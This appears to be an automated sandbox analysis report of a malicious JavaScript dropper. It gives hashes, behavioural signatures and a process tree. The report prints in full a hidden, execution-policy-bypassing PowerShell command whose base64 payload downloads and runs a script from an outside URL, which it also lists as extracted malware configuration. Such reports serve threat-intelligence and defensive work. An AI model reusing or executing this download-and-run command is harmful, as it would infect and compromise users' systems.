Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
12-01-2024 13:58
Static task
static1
Behavioral task
behavioral1
Sample
56a5a4536b6128085e1213ad6b997284.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
56a5a4536b6128085e1213ad6b997284.js
Resource
win10v2004-20231222-en
General
-
Target
56a5a4536b6128085e1213ad6b997284.js
-
Size
60KB
-
MD5
56a5a4536b6128085e1213ad6b997284
-
SHA1
7893be62a18683b1b9107a79fd819df9034ef89d
-
SHA256
60cb33a00ba627061d14b3bf96df7aa11fdc17105d6ab59812b4c59bd804706f
-
SHA512
ab8e9a16758dc69a49c412c54d42314987d0f062fbdc2a45d758262bf2c82260500cae179c3c0f7f33d1b8ed0f85ab35662a03f435d32f10641bce820a49891d
-
SSDEEP
1536:59Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzIEN4t/od:59Ry98guHVBqqg2bcruzUHmLKeMMU7GH
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2696 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2696 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1668 wrote to memory of 3056 1668 wscript.exe 30 PID 1668 wrote to memory of 3056 1668 wscript.exe 30 PID 1668 wrote to memory of 3056 1668 wscript.exe 30 PID 3056 wrote to memory of 2696 3056 cmd.exe 28 PID 3056 wrote to memory of 2696 3056 cmd.exe 28 PID 3056 wrote to memory of 2696 3056 cmd.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\56a5a4536b6128085e1213ad6b997284.js1⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:3056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696